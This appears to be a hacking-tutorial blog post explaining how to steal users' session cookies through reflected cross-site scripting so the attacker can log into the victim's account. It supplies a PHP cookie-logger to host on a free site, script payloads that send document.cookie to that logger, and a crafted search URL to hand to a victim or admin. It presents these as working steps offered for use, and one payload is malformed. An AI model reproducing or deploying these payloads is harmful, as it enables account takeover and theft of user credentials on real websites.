This method (XSS attacks) is for get the cookies users, so, for get information of users… and then, login into the account of the victim user…u will have to give one adress to the admin or the user u want to enter in his account…

What is cooke?

In computing, a cookie (also tracking cookie, browser cookie, and HTTP cookie) is a small piece of text stored on a user’s computer by a web browser. A cookie consists of one or more name-value pairs containing bits of information such as user preferences, shopping cart contents, the identifier for a server-based session, or other data used by websites.

It is sent as an HTTP header by a web server to a web browser and then sent back unchanged by the browser each time it accesses that server. A cookie can be used for authenticating, session tracking (state maintenance), and remembering specific information about users, such as site preferences or the contents of their electronic shopping carts. The term “cookie” is derived from “magic cookie”, a well-known concept in UNIX computing which inspired both the idea and the name of browser cookies. Some alternatives to cookies exist; each has its own uses, advantages, and drawbacks.

Being simple pieces of text, cookies are not executable. They are neither spyware or viruses, although cookies from certain sites are detected by many anti-spyware products because they can allow users to be tracked when they visit various sites.

Most modern browsers allow users to decide whether to accept cookies, and the time frame to keep them, but rejecting cookies makes some websites unusable. For example, shopping carts or login systems implemented using cookies do not work if cookies are disabled.

– Now, we already know what’s a cookie!

You can create a cookie logger :
Code:

<?php
$cookie = $_GET[‘cookie’];
$log = fopen(“cookie.txt”, “a”);
fwrite($log, $cookie .”\n”);
fclose($log);
?>

Host it on a freehost as a .php file. I recommend to use 0catch.com. You will also have to upload a separate “cookie.txt” file to your website.

Now that you’ve made a cookie logger, insert the following code into the vulnerable website to steal their cookies.

<script>alert(www.yourcookielogger.com/cookielogger.php)</script>

or

<script>document.location=’www.yourcookielogger.com/cookielogger.php?cookie=’+escape(document.cookie) </script>

EXPLOITING …..

To can get the cookies of the user that you want, you must give a adress to the ‘victim’, the victim will enter in the adress, and this adress will be redirect the victim to your host, to cookies.php for keep his cookies in cookie.txt

the adress u must give to the victim for get his cookies:


http://www.vulnerable_wepage_victim.com/search.php?word=<script>window.location=’http://www.your_website.com/cookies.php?cookie=’+document.cookie;</script>&Search=;
http://www.vulnerable_wepage_victim.com/

The victim website… that has a search, uses cookies and it’s vulnerable.

This attack bases in redirect a user to your page, in that you keep his cookie.

This method can be applied to other forms like a search for example a register of a forum…… etc.

Explore More

Targets of a Hack Attack

Hacker interests lie in many types of computers on the Internet. Following is a discussion of the types of targets and their appeal to the perpetrators.Corporate Networks Corporate computers are

Read More

Cyber attacks are real but is there any foolproof defense yet?

Tulip Systems Inc., the world renowned high bandwidth and broadcast stream hosting service US corporation was under repeated cyber attacks aimed at disrupting web services during the Georgia-Russia standoff few

Read More

What is Buffer Overflows?

Buffer Overflows Buffer Overflows have been around since the very beginnings of the Von-Neuman architecture. They first gained widespread notoriety in 1988 with the Morris Internet worm. Unfortunately, the same

Read More